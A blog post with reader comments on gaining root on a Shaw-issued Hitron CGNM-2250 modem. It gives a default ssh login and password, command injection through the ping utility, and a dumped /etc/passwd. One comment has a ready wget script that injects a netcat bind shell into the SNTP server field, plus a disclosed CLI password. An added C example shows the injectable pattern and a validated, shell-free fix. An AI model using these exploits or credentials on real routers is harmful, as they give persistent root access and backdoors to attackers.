Edit: This has been fixed in the latest firmware update, 4.5.10.25.

The routers that you receive from your ISP are almost always garbage: not many options to configure and pitiful wifi range. The router/modem that Shaw customers receive, the Hitron CGNM-2250, thankfully isn't completely terrible: 802.11ac plus gigabit ports. I was poking about and researching the model and came upon a remote code execution exploit for a similar model version. The CGNM-2250 is vulnerable as well; for reference, my software version is 4.5.8.20 with hardware version 1A. The input to the ping utility in the web interface isn't sanitized, so you can inject arbitrary shell commands through it. Using that, I discovered that it has a few basic utilities, including Dropbear.

 

From there you can ssh into your router with

ssh mso@192.168.0.1 -p 29

The password is msopassword (go figure!).

You'll be greeted with a fun menu-driven interface.

Most of the menus are for debugging and initial programming purposes. There is a menu option to set the TFTP download image URL used to flash the device, so it might be possible to flash your own firmware, though I don't know how feasible that is.

Going back to the web interface, I used the command injection to see what tools and programs are available on the router.

It is your basic Linux system: busybox plus some manufacturer utilities. For a full list of the binaries available, see here: https://pasteros.io/573e15ddde8f9 Through digging in the CLI menu I found that /etc/scripts/sys_startup.sh is run on startup, which makes it easy to inject any commands you want to run at boot. I haven't been able to get to a shell yet, since logging in as the 'mso' user drops you into the CLI menu. But cat /etc/passwd reveals:

root:$1$27272727:0:0::/:/bin/false
nobody:$1$27272727:65535:65535::/:/bin/false
mso:$1$1w7AswO3$IJCko5PwRk6ChJrIYgMQs/:100:100::/:/usr/sbin/cli

Note that mso is the only account with a real password hash; root and nobody have /bin/false as their shell. Since mso's login shell is /usr/sbin/cli, replacing that binary with a symlink to /bin/sh (or changing the shell field in /etc/passwd) should drop you straight to a shell on login. Entering commands via the web interface is a bit tricky since it doesn't like pipes (|), but it's just a matter of getting around the JS validation, which only runs in the browser. Once I can get to a shell I'll write a followup to this post.

Issue patched in version 4.5.10.25.

 

Comments

I found it by searching around the filesystem for strings that appeared in the CLI and following linked libraries. Eventually I came across a library file that had some hints that this was the password. I don't have all the details with me now, but with some more skills/knowledge this could be easily reversed since we have access to all of the files.

The CLI shell is run as a restricted user, however, so I had to plant a root shell upgrade using the command injection to get a full root shell.

I have this router through Shaw (Canadian ISP) with FW 4.5.10.40, so the webapp exploit no longer works. I need root on the device to set up an ssh server (dropbear, I guess, would be fine). In your investigations did you find any other ways to get root?

A root shell is possible in firmware 4.5.10.40 through another input validation bug in Administration/Time Setting. You need to sniff network traffic to retrieve the userId cookie and csrf_token, then use wget or curl to set the SNTP server to (for example) "$(nc$IFS-l$IFS-p1337$IFS-e$IFS/bin/sh)". The web interface does not allow special characters, so wget/curl bypasses the client-side checks. Once this special time server is set you can enable SNTP, and you'll be able to connect to port 1337 using netcat on a client machine and get a root shell. The change is persistent through reboots (until Shaw finds out about it), and you can disable it by changing the time setting back to the ToD function.

My wget script is:

wget --header="Cookie: userid=$USERID; userName=; password=" -O /dev/stdout http://192.168.0.1/goform/Sntp --post-data="model=%7B%22sntpOnOff%22%3A%22Enabled%22%2C%22sntpTimeZone%22%3A%220%22%2C%22sntpSrvName%22%3A%22%24%28nc%24IFS-l%24IFS-p1337%24IFS-e%24IFS/bin/sh%29%22%2C%22todOnOff%22%3A%22Disabled%22%2C%22todTimeZone%22%3A%220%22%2C%22daylightOnOff%22%3A%22Enabled%22%2C%22daylightTime%22%3A%2260%22%2C%22sntpinfo%22%3A%221%22%2C%22sntpTime%22%3A%22%22%7D&csrf_token=$CSRF"

Set $USERID and $CSRF to what you find from sniffing.

Using this I was able to dump the entire flash. If I recall, the password to get out of the CLI is found inside libcli_core.so; use strings to find it. In mine this password appears to be: "D0nt4g3tme!"
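The ping injection in the post above and the SNTP-server injection in this comment are the same bug class: a request field spliced into a shell command line, with only browser-side JavaScript standing in the way. The C below is an added example, not Hitron's firmware code; the function names and the handler shapes are hypothetical. It shows the vulnerable shell-out pattern next to a server-side allow-list and a direct exec of ping with an argv array, and runs the two payload shapes from this page through the validator.

```c
/*
 * Added example (not the Hitron firmware's code): the shell-out pattern that
 * makes a web "ping" diagnostic or an SNTP-server field injectable, beside a
 * hardened version.  Function and handler names here are hypothetical.
 */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define CMD_MAX 512

/*
 * Vulnerable pattern: the request parameter is spliced into a command line
 * that would be handed to system(), i.e. to /bin/sh -c.  Anything the shell
 * interprets ($(...), backticks, ';', '|', and $IFS standing in for a space)
 * runs with the web server's privileges, which on this class of device is
 * root.  Returns the command line that would run, without running it.
 */
int build_ping_cmd_unsafe(const char *target, char *cmd, size_t cmdlen)
{
    int n = snprintf(cmd, cmdlen, "ping -c 4 %s", target);
    return (n > 0 && (size_t)n < cmdlen) ? 0 : -1;
}

/*
 * Client-side JavaScript checks are not a control: wget/curl never run them,
 * so the server must validate.  Accept only what a hostname or IP literal
 * can contain (letters, digits, '.', '-', ':' for IPv6), cap the length at
 * 253, and refuse a leading '-' so the value cannot be parsed as a ping
 * option.  Returns 1 if acceptable, 0 otherwise.
 */
int is_safe_host(const char *s)
{
    size_t len = strlen(s);
    if (len == 0 || len > 253 || s[0] == '-')
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == '.' || c == '-' || c == ':'))
            return 0;
    }
    return 1;
}

/*
 * Hardened: validate, then exec ping directly with an argv array.  No shell
 * is involved, so metacharacters have no meaning even if the allow-list
 * above were loosened.  Returns ping's exit status, or -1 on rejection.
 */
int ping_safe(const char *target)
{
    if (!is_safe_host(target))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "ping", "-c", "4", (char *)target, NULL };
        execvp("ping", argv);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed inputs: a benign target plus the two payload shapes on this page. */
    const char *inputs[] = {
        "192.168.0.1",
        "8.8.8.8; cat /etc/passwd",
        "$(nc$IFS-l$IFS-p1337$IFS-e$IFS/bin/sh)",
    };
    char cmd[CMD_MAX];
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        build_ping_cmd_unsafe(inputs[i], cmd, sizeof cmd);
        printf("shell would run: %s\n    validator: %s\n", cmd,
               is_safe_host(inputs[i]) ? "accepted" : "rejected");
    }
    return 0;
}
```

$IFS is what lets the SNTP payload avoid literal spaces: the shell expands it to whitespace while evaluating the $(...) substitution, so a filter that only strips spaces is not a control. The allow-list rejects the '$' and '(' characters instead, and execvp with an argv array means no shell ever sees the value; the leading '-' check is there because ping itself would otherwise accept an option in place of a host.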

Could you send me a tutorial on how to get to the root shell? Also, do you know what the password for the user "mso" is, or where/if I could find it? I have never used wget before. I have 2 of these Hitron modems that I got for free and I want to try enabling some of their extra features, such as support for multiple SSIDs and the USB ports, so I can use them as wifi access points. Any help would be greatly appreciated. I also have one of these Hitron modems from Shaw which I am using to receive my cable service. I would love to find out how I could get to extra diagnostic menus that would let me read the signal levels, see how many upstream and downstream channels my modem is using, or other stuff.

After some trial and error I was able to run the wget script on 2 of my Hitron modems and set the SNTP server to "$(nc$IFS-l$IFS-p1337$IFS-e$IFS/bin/sh)"; however, now I have no idea how to connect to port 1337 using netcat. I tried running netcat and the furthest I got was to a screen that said "Connection to 192.168.0.1 1337 port [udp/*] succeeded!" when I entered the following command in the terminal: "nc -v -u 192.168.0.1 1337"

Hi, great info on this thread! I also have a Hitron 2250 from Shaw. I'm a coder, not much work on hardware. I've been fighting the "worst malware ever" for weeks, tried absolutely everything, even formatting didn't fix it, and then getting an entirely new laptop *still* didn't fix it! It's invisible to virus scans, McAfee tech support, Shaw...

I dug deeper & found a couple of reports of the identical issue, and the identical modem. I've put together a db to track the network connections & services (i.e., netstat + tasklist) to figure out what's going on. My last step was to add the modem's activity log to cross-check, but they don't exist! (Or am I blind?)

I assume the log would still be stored, though, right? I found a few sites with some starting steps (like https://redd.it/6l5nwg & https://goo.gl/CFHsE1). And would I need Linux, or is the Windows version (with a big warning) a bad idea?! https://eternallybored.org/misc/netcat/

I've tried literally everything on that stupid modem. The thing is, it's the stupidest virus ever; it's basically just a timed browser redirect to pages that don't even work. I swear the background task actually watches for when I start deleting things, and it relocates its important files (and grabs anything missing back off the modem). Honestly, I'm not crazy! Or else I've been outsmarted by a piece of code. :-(